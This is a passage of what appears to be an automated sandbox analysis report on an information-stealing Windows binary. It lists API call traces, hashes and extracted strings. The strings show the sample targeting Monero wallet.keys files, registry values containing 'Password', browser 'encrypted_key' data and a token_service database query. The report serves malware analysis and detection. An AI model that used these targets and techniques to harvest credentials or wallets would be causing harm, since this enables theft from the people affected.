                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 18658e90dfb43333fe744fb3d5a6f2d86277bbe242b40658f9beab8b8090595b
                        • Instruction ID: 2d1031196e61eaa3f7d9a47e3dfad79a042de259e04f891db93c78f620395ca0
                        • Opcode Fuzzy Hash: 18658e90dfb43333fe744fb3d5a6f2d86277bbe242b40658f9beab8b8090595b
                        • Instruction Fuzzy Hash: A1C1C6B99001099BCB14EF61DC89FEA7378BB54301F044599F90A67181EB70AACDDFA5
                        Function 00C54280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C542EC
                        • lstrcat.KERNEL32(?,008A03C0), ref: 00C5430B
                        • lstrcat.KERNEL32(?,?), ref: 00C5431F
                        • lstrcat.KERNEL32(?,0089F308), ref: 00C54333
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58D90: GetFileAttributesA.KERNEL32(00000000,?,00C41B54,?,?,00C6564C,?,?,00C60E1F), ref: 00C58D9F
                          • Part of subcall function 00C49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C49D39
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C593C0: GlobalAlloc.KERNEL32(00000000,00C543DD,00C543DD), ref: 00C593D3
                        • StrStrA.SHLWAPI(?,008A02A0), ref: 00C543F3
                        • GlobalFree.KERNEL32(?), ref: 00C54512
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                          • Part of subcall function 00C49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                          • Part of subcall function 00C49AC0: LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00C544A3
                        • StrCmpCA.SHLWAPI(?,00C608D1), ref: 00C544C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C544D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00C544E5
                        • lstrcat.KERNEL32(00000000,00C60FB8), ref: 00C544F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 456b459f0769c31f0009f0481f6907c5111081ea029890f766c195db85db9e77
                        • Instruction ID: f497c738e019533198269e3f29f37fe1f821f5f7ebb91e4d74b12dc3ec2e4e4d
                        • Opcode Fuzzy Hash: 456b459f0769c31f0009f0481f6907c5111081ea029890f766c195db85db9e77
                        • Instruction Fuzzy Hash: 0D717A76900218ABDB14EBA0DC89FEE7379BB48301F044599F609A7181EA34DB8DDF65
                        Function 00C41310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C412B4
                          • Part of subcall function 00C412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C412BB
                          • Part of subcall function 00C412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C412D7
                          • Part of subcall function 00C412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C412F5
                          • Part of subcall function 00C412A0: RegCloseKey.ADVAPI32(?), ref: 00C412FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4134F
                        • lstrlen.KERNEL32(?), ref: 00C4135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00C41377
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C41465
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00C414EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 3d1d9ea3c0c50558c7e83ebfa2192bc73457ce3b053c5b49d1083c2f4d35d529
                        • Instruction ID: 5c7a932619649ac11790dc6df7c38845c2bd15d92dfa479f6204c0e51dfc0812
                        • Opcode Fuzzy Hash: 3d1d9ea3c0c50558c7e83ebfa2192bc73457ce3b053c5b49d1083c2f4d35d529
                        • Instruction Fuzzy Hash: 5B5154B5D501185BDB15EB61DC92BED733CAF54301F4042A8BA0A62081EE306BCDDFAA
                        Function 00C475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C4733A
                          • Part of subcall function 00C472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C473B1
                          • Part of subcall function 00C472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C4740D
                          • Part of subcall function 00C472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C47452
                          • Part of subcall function 00C472D0: HeapFree.KERNEL32(00000000), ref: 00C47459
                        • lstrcat.KERNEL32(00000000,00C617FC), ref: 00C47606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C47648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00C4765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C4768F
                        • lstrcat.KERNEL32(00000000,00C61804), ref: 00C476A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C476D3
                        • lstrcat.KERNEL32(00000000,00C61808), ref: 00C476ED
                        • task.LIBCPMTD ref: 00C476FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: 8ceb89b22a456c9a589a498520454477da9214844eb962b4c0d4e3e1437be922
                        • Instruction ID: 1048d8626bc895c8001f8b8aa44e98b911afd33100e26d4b0af66f1b97439f7b
                        • Opcode Fuzzy Hash: 8ceb89b22a456c9a589a498520454477da9214844eb962b4c0d4e3e1437be922
                        • Instruction Fuzzy Hash: 633162B1900109DFDB08EBB5DC8ADFE7375FB44302B184129F506B7191EB34A94AEB61
                        Function 00C58100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008A00D8,00000000,?,00C60E2C,00000000,?,00000000), ref: 00C58130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C58158
                        • __aulldiv.LIBCMT ref: 00C58172
                        • __aulldiv.LIBCMT ref: 00C58180
                        • wsprintfA.USER32 ref: 00C581AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: f8d362ce684e81e20e279c0a23ca530ea8f7c56e2fe1900d10d0efcf1123c082
                        • Instruction ID: 287d0aa0f5d020ba287b6ffb25fa060a5ae81912c689cc739fea2ccfb5baf56e
                        • Opcode Fuzzy Hash: f8d362ce684e81e20e279c0a23ca530ea8f7c56e2fe1900d10d0efcf1123c082
                        • Instruction Fuzzy Hash: 23213BB1E44208ABEB10DFD5CC49FAFB7B8FB44B01F104119F605BB280D77859498BA9
                        Function 00C460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                        • InternetOpenA.WININET(00C60DF7,00000001,00000000,00000000,00000000), ref: 00C4610F
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C4618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C461B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00C461DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C4620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00C46249
                        • InternetCloseHandle.WININET(?), ref: 00C46253
                        • InternetCloseHandle.WININET(00000000), ref: 00C46260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 658d10da7c7c9f897bc9fa57b9c6f52d7bf9351403f1bfeab17ab330a9e6bfdc
                        • Instruction ID: 17fbc3c4e6daa1678b7d8f688bb1cfa630c2376f252c0b0af388daa77cc84a50
                        • Opcode Fuzzy Hash: 658d10da7c7c9f897bc9fa57b9c6f52d7bf9351403f1bfeab17ab330a9e6bfdc
                        • Instruction Fuzzy Hash: C35171B1900208AFEB20DF61DC45BEE7778FB04701F1081A9B609B71C4DBB56A89DF96
                        Function 00C472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C4733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C473B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C4740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C47452
                        • HeapFree.KERNEL32(00000000), ref: 00C47459
                        • task.LIBCPMTD ref: 00C47555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: ee6a3a6680672f1d57cd4a39d76985c5f0b0ea8886ca82d61dc703356372a540
                        • Instruction ID: c92715bf75b6cfaa8d0eaa6df06c493b3f4b1248a69f1d1cb02465b2a9a37287
                        • Opcode Fuzzy Hash: ee6a3a6680672f1d57cd4a39d76985c5f0b0ea8886ca82d61dc703356372a540
                        • Instruction Fuzzy Hash: 5A611CB59141689BDB24DB50CC45BEEB7B8BF44300F0482E9E649A6141DFB05FC9DFA1
                        Function 00C4BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00C4BC9F
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C4BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00C4BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00C4BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 2feafb79ffe67a0c408f58fcaba1926669f7b2c33b51bc3f8fc06eecd80eac37
                        • Instruction ID: 669cdf20eff9b473f16aa133f15864c74aec820327530ad87e08781e47a73c17
                        • Opcode Fuzzy Hash: 2feafb79ffe67a0c408f58fcaba1926669f7b2c33b51bc3f8fc06eecd80eac37
                        • Instruction Fuzzy Hash: 89B150759101089BDB14EBA1CC96EEE7338BF54302F444269F906B2191EF346E8DEB66
                        Function 00C56770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
